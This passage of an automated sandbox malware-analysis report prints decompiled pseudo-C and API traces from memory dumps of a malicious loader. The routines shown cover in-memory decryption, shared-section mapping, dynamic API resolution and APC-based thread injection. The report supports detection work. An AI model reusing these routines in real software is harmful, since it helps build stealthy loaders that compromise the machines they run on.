NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02EE1C0E,00000002,00000000,?,?,00000000,?,?,02EE1C0E,00000000), ref: 02EE1EF4

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 733582a3321a7f5f170147fcbdc2df27f36b205f17c38a0daa08d177abc11d9f
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 7DF037B690420CFFDB119FA5CC85CDFBBBDEB44354B108939F552E5090D6709E488B60

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E02EE1C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E02EE1F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E02EE18AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E02EE1ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E02EE13D1(E02EE14E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E02EE134F(_t45,  &_v48) != 0) {
					 *0x2ee41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x2ee41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E02EE1B58(_t50 + _t15);
				 *0x2ee41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E02EE142F(_t44);
					goto L11;
				}
			}

0x02ee1c89
0x02ee1c92
0x02ee1c96
0x02ee1d9e
0x02ee1da4
0x00000000
0x00000000
0x00000000
0x02ee1c9c
0x02ee1c9c
0x02ee1ca1
0x02ee1ca7
0x02ee1cb6
0x02ee1cb7
0x02ee1cba
0x02ee1cbd
0x02ee1cc6
0x02ee1cca
0x02ee1cd0
0x02ee1cd4
0x02ee1cdb
0x00000000
0x00000000
0x02ee1ce1
0x02ee1ce8
0x02ee1cec
0x02ee1d8f
0x02ee1d8f
0x02ee1d96
0x02ee1d98
0x02ee1d98
0x00000000
0x02ee1d96
0x02ee1cf5
0x02ee1d48
0x02ee1d48
0x02ee1d59
0x02ee1d5d
0x02ee1d8b
0x02ee1d5f
0x02ee1d62
0x02ee1d6a
0x02ee1d6e
0x02ee1d76
0x02ee1d76
0x02ee1d7d
0x02ee1d7d
0x00000000
0x02ee1d5d
0x02ee1d03
0x02ee1d42
0x00000000
0x02ee1d42
0x02ee1d05
0x02ee1d09
0x02ee1d12
0x02ee1d14
0x02ee1d18
0x02ee1d3a
0x02ee1d3a
0x00000000
0x02ee1d3a
0x02ee1d1a
0x02ee1d1f
0x02ee1d26
0x02ee1d2b
0x00000000
0x02ee1d2d
0x02ee1d30
0x02ee1d33
0x00000000
0x02ee1d33

APIs

Part of subcall function 02EE1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,02EE1C8E,74B063F0,00000000), ref: 02EE1F1F
Part of subcall function 02EE1F10: GetVersion.KERNEL32 ref: 02EE1F2E
Part of subcall function 02EE1F10: GetCurrentProcessId.KERNEL32 ref: 02EE1F3D
Part of subcall function 02EE1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02EE1F56

GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 02EE1CA1
SwitchToThread.KERNEL32 ref: 02EE1CA7

Part of subcall function 02EE18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 02EE1903
Part of subcall function 02EE18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 02EE19C9

Sleep.KERNELBASE(00000000,00000000), ref: 02EE1CCA
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 02EE1D12
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 02EE1D30
WaitForSingleObject.KERNEL32(00000000,000000FF,02EE14E8,?,00000000), ref: 02EE1D62
GetExitCodeThread.KERNEL32(00000000,?), ref: 02EE1D76
CloseHandle.KERNEL32(00000000), ref: 02EE1D7D
GetLastError.KERNEL32(02EE14E8,?,00000000), ref: 02EE1D85
GetLastError.KERNEL32 ref: 02EE1D98

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: b9166e582a3e5f8ad4325150b51f9c308118b36e59f9a8b163e1a45b85ad899d
Instruction ID: f17bbc1e1c92c09760e8329c9a5639aae6191fad4f1c1d332a71ee3b6ee19332
Opcode Fuzzy Hash: b9166e582a3e5f8ad4325150b51f9c308118b36e59f9a8b163e1a45b85ad899d
Instruction Fuzzy Hash: E5319271DC4301DBCF20DF669844AAE77EDAF85255B409E1AF85ADB140E770C9C08BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E02EE1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L02EE2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x2ee41d0;
				_push(_t15 + 0x2ee505e);
				_push(_t15 + 0x2ee5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L02EE220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x2ee41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x02ee1144
0x02ee114d
0x02ee1151
0x02ee1157
0x02ee115c
0x02ee1161
0x02ee1164
0x02ee1167
0x02ee116c
0x02ee116d
0x02ee1170
0x02ee117b
0x02ee1182
0x02ee1186
0x02ee1188
0x02ee1189
0x02ee118c
0x02ee1191
0x02ee119b
0x02ee119d
0x02ee119d
0x02ee11b1
0x02ee11b7
0x02ee11bb
0x02ee120b
0x02ee11bd
0x02ee11c6
0x02ee11dc
0x02ee11e4
0x02ee11f6
0x02ee11fa
0x00000000
0x00000000
0x02ee11e6
0x02ee11e9
0x02ee11ee
0x02ee11f0
0x02ee11f0
0x02ee11d1
0x02ee11d3
0x02ee11fc
0x02ee11fd
0x02ee11fd
0x02ee11c6
0x02ee1213

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,02EE156A,0000000A,?,?), ref: 02EE1151
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02EE1167
_snwprintf.NTDLL ref: 02EE118C
CreateFileMappingW.KERNELBASE(000000FF,02EE41C0,00000004,00000000,?,?), ref: 02EE11B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02EE156A,0000000A,?), ref: 02EE11C8
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02EE11DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02EE156A,0000000A,?), ref: 02EE11F4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02EE156A,0000000A), ref: 02EE11FD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02EE156A,0000000A,?), ref: 02EE1205

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: b03a03b453d4b68796fa316e32de8be20801fc7eeedb3c2d17c914e9cb2658a6
Instruction ID: 4a9d4b231c1c568441bd8f5efd57e6eeb61661afb39005abe7975c33dd70bd43
Opcode Fuzzy Hash: b03a03b453d4b68796fa316e32de8be20801fc7eeedb3c2d17c914e9cb2658a6
Instruction Fuzzy Hash: 9E21C1B29C0108FFDF20AF99DC84EAE37A8EB48355F508565FA1ADB180D7305980CB70

Uniqueness

Uniqueness Score: -1.00%

Function 02F25220, Relevance: 10.8, APIs: 7, Instructions: 317COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 02F2525E
GetFileType.KERNEL32(?), ref: 02F254C7

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: FileInfoStartupType
String ID:
API String ID: 3016745765-0
Opcode ID: 06a887076df37b7813ab41b72a90db889f929efe9fae657d6a65ad2a798855c7
Instruction ID: 4960215cad0d62bd08b0677b8f923b2e38eaffc410d4e72930d2a6830938808f
Opcode Fuzzy Hash: 06a887076df37b7813ab41b72a90db889f929efe9fae657d6a65ad2a798855c7
Instruction Fuzzy Hash: 70E11A74E04258CFDB28CFA8C894AADFBB1FB4A355F64825DD925AB382C7319845CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EE1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E02EE1B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x2ee41d0 + 0x2ee5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x2ee41d0 + 0x2ee50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E02EE142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x2ee41d0 + 0x2ee50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x2ee41d0 + 0x2ee5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x2ee41d0 + 0x2ee5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x2ee41d0 + 0x2ee512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E02EE1B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02ee106e
0x02ee1072
0x02ee1133
0x02ee1078
0x02ee1090
0x02ee109f
0x02ee10a6
0x02ee10aa
0x02ee10ad
0x02ee112b
0x02ee112c
0x02ee10af
0x02ee10bc
0x02ee10c0
0x02ee10c3
0x00000000
0x02ee10c5
0x02ee10d2
0x02ee10d6
0x02ee10d9
0x00000000
0x02ee10db
0x02ee10e8
0x02ee10ec
0x02ee10ef
0x00000000
0x02ee10f1
0x02ee10fe
0x02ee1102
0x02ee1105
0x00000000
0x02ee1107
0x02ee110d
0x02ee1113
0x02ee1118
0x02ee111f
0x02ee1122
0x00000000
0x02ee1124
0x02ee1127
0x02ee1127
0x02ee1122
0x02ee1105
0x02ee10ef
0x02ee10d9
0x02ee10c3
0x02ee10ad
0x02ee1141

APIs

Part of subcall function 02EE1B58: HeapAlloc.KERNEL32(00000000,?,02EE1702,?,00000000,00000000,?,?,?,02EE1CE6), ref: 02EE1B64

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,02EE1480,?,?,?,?,00000002,00000000,?,?), ref: 02EE1084
GetProcAddress.KERNEL32(00000000,?), ref: 02EE10A6
GetProcAddress.KERNEL32(00000000,?), ref: 02EE10BC
GetProcAddress.KERNEL32(00000000,?), ref: 02EE10D2
GetProcAddress.KERNEL32(00000000,?), ref: 02EE10E8
GetProcAddress.KERNEL32(00000000,?), ref: 02EE10FE

Part of subcall function 02EE1B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 02EE1BF9
Part of subcall function 02EE1B9C: memset.NTDLL ref: 02EE1C1B

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 67e851308eb035c225e23f242d5acf5e73a3141f005454572fb35d31918ad274
Instruction ID: fd54e77afd6e2ece9386dd995aec408e2617d85c2c0646ea1f9afe65cd2e827a
Opcode Fuzzy Hash: 67e851308eb035c225e23f242d5acf5e73a3141f005454572fb35d31918ad274
Instruction Fuzzy Hash: 8C21F9B198060ADFDF10EF69E884E5A77ECEB04748B419825F94ADB241E730EA51CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x2ee4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x2ee418c;
						if( *0x2ee418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1); // executed
								__eflags =  *0x2ee4198;
								if( *0x2ee4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x2ee418c);
						}
						HeapDestroy( *0x2ee4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x2ee4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x2ee4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x2ee41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E02EE13D1(E02EE20CE, E02EE121C(_a12, 1, 0x2ee4198, _t41));
							 *0x2ee418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x02ee1db1
0x02ee1dbd
0x02ee1dbf
0x02ee1dc2
0x02ee1e38
0x02ee1e3e
0x02ee1e40
0x02ee1e42
0x02ee1e48
0x02ee1e4a
0x02ee1e4f
0x02ee1e52
0x02ee1e5d
0x02ee1e5f
0x00000000
0x00000000
0x02ee1e61
0x02ee1e64
0x02ee1e66
0x00000000
0x00000000
0x00000000
0x02ee1e66
0x02ee1e6e
0x02ee1e6e
0x02ee1e7a
0x02ee1e7a
0x02ee1dc4
0x02ee1dc5
0x02ee1de5
0x02ee1deb
0x02ee1ded
0x02ee1df2
0x02ee1e2e
0x02ee1e2e
0x02ee1df4
0x02ee1dfc
0x02ee1e03
0x02ee1e0d
0x02ee1e19
0x02ee1e20
0x02ee1e25
0x02ee1e2a
0x00000000
0x02ee1e2a
0x02ee1e25
0x02ee1df2
0x02ee1dc5
0x02ee1e87

APIs

InterlockedIncrement.KERNEL32(02EE4188), ref: 02EE1DD0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 02EE1DE5

Part of subcall function 02EE13D1: CreateThread.KERNEL32 ref: 02EE13E8
Part of subcall function 02EE13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 02EE13FD
Part of subcall function 02EE13D1: GetLastError.KERNEL32(00000000), ref: 02EE1408
Part of subcall function 02EE13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 02EE1412
Part of subcall function 02EE13D1: CloseHandle.KERNEL32(00000000), ref: 02EE1419
Part of subcall function 02EE13D1: SetLastError.KERNEL32(00000000), ref: 02EE1422

InterlockedDecrement.KERNEL32(02EE4188), ref: 02EE1E38
SleepEx.KERNELBASE(00000064,00000001), ref: 02EE1E52
CloseHandle.KERNEL32 ref: 02EE1E6E
HeapDestroy.KERNEL32 ref: 02EE1E7A

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 3c58ea94bd2ff90f894ccfaee475e20eabbc36116e92d55af5226b0d58967ede
Instruction ID: b9419b0fe6445aabf47901181052ba7459a25d2642d51e65b3d6a25760c16e02
Opcode Fuzzy Hash: 3c58ea94bd2ff90f894ccfaee475e20eabbc36116e92d55af5226b0d58967ede
Instruction Fuzzy Hash: A221C631EC0300EBDF10AFAAEC44A6A7BA9F7547687949569F50AEB190D3708DD0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EE13D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EE13D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x2ee41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x02ee13e8
0x02ee13ee
0x02ee13f2
0x02ee13fd
0x02ee1405
0x02ee140e
0x02ee1412
0x02ee1419
0x02ee1420
0x02ee1422
0x02ee1428
0x02ee1405
0x02ee142c

APIs

CreateThread.KERNEL32 ref: 02EE13E8
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 02EE13FD
GetLastError.KERNEL32(00000000), ref: 02EE1408
TerminateThread.KERNEL32(00000000,00000000), ref: 02EE1412
CloseHandle.KERNEL32(00000000), ref: 02EE1419
SetLastError.KERNEL32(00000000), ref: 02EE1422

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: f6549b20cef01c451942fd6cc2075dc71e2d5c57209bd2065446aed6df9843d7
Instruction ID: c9dfceb5c4b3f13394ea5b4e3dfd745e68bccfda25d94c2bb739d9616741df5a
Opcode Fuzzy Hash: f6549b20cef01c451942fd6cc2075dc71e2d5c57209bd2065446aed6df9843d7
Instruction Fuzzy Hash: AAF05432DC0620FBDF215BA2AC0CF6F7B69FF48611F404C84F6099A240C72149A08791

Uniqueness

Uniqueness Score: -1.00%

Function 02F17A60, Relevance: 7.8, APIs: 5, Instructions: 327COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(00000000,00000718), ref: 02F17AC8
GetCurrentDirectoryA.KERNEL32(00000718,?,02F5300C), ref: 02F17BB6
delete.LIBCMTD ref: 02F17EB5
std::_Lockit::_Lockit.LIBCPMTD ref: 02F17ED4
std::_Lockit::~_Lockit.LIBCPMTD ref: 02F17EFF

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: DirectoryLockitstd::_$CurrentLockit::_Lockit::~_Systemdelete
String ID:
API String ID: 4219208524-0
Opcode ID: 28235e25aea61b2d7b2c982c474daa44227e6140b758810af1b26b6ff65e61d8
Instruction ID: 88ba68807e200d09ee33b3fd3571ad584e2cc1bff27d17ed2d734cc9a0c47d34
Opcode Fuzzy Hash: 28235e25aea61b2d7b2c982c474daa44227e6140b758810af1b26b6ff65e61d8
Instruction Fuzzy Hash: B9D19171E843288FC314DF28D99065AFBE6EB44BD8F40896DD70A87244D770A529CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02EE18AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E02EE18AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x2ee41b0;
				_t50 = E02EE1000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x2ee41cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x2ee5137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x2ee41cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x02ee18b4
0x02ee18c4
0x02ee18cb
0x02ee18ce
0x02ee18e3
0x02ee18ea
0x02ee18ef
0x02ee1900
0x02ee1903
0x02ee1909
0x02ee190d
0x02ee1910
0x02ee19ec
0x02ee1916
0x02ee1916
0x02ee191a
0x02ee19b2
0x02ee1920
0x02ee1921
0x02ee1926
0x02ee1929
0x02ee192c
0x02ee192c
0x02ee1933
0x02ee1936
0x02ee193e
0x02ee193f
0x02ee1940
0x02ee1947
0x02ee194b
0x02ee1951
0x02ee1955
0x02ee1957
0x02ee195b
0x02ee195e
0x02ee1965
0x02ee1968
0x02ee196d
0x02ee1970
0x02ee1986
0x02ee1972
0x02ee197c
0x02ee197e
0x02ee1981
0x02ee1981
0x02ee198d
0x02ee198d
0x02ee198d
0x02ee1965
0x02ee1998
0x02ee199b
0x02ee199e
0x02ee19a7
0x02ee19a7
0x02ee19af
0x02ee19be
0x02ee19d3
0x02ee19c0
0x02ee19c9
0x02ee19ce
0x02ee19e4
0x02ee19e4
0x02ee19f3
0x02ee19f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 02EE1903
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 02EE19C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 02EE19E4

Strings

Jun 6 2021, xrefs: 02EE1936

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 6 2021
API String ID: 4010158826-1013970402
Opcode ID: 82bcdedacc0c3d4d310ba3edca22c50e924fae04d56a0a02bd4174ba4e5fcfb5
Instruction ID: e38fe613a5437c562011299ee1b82f6d621ef11c25cc7d7369cfef6ee24de3d6
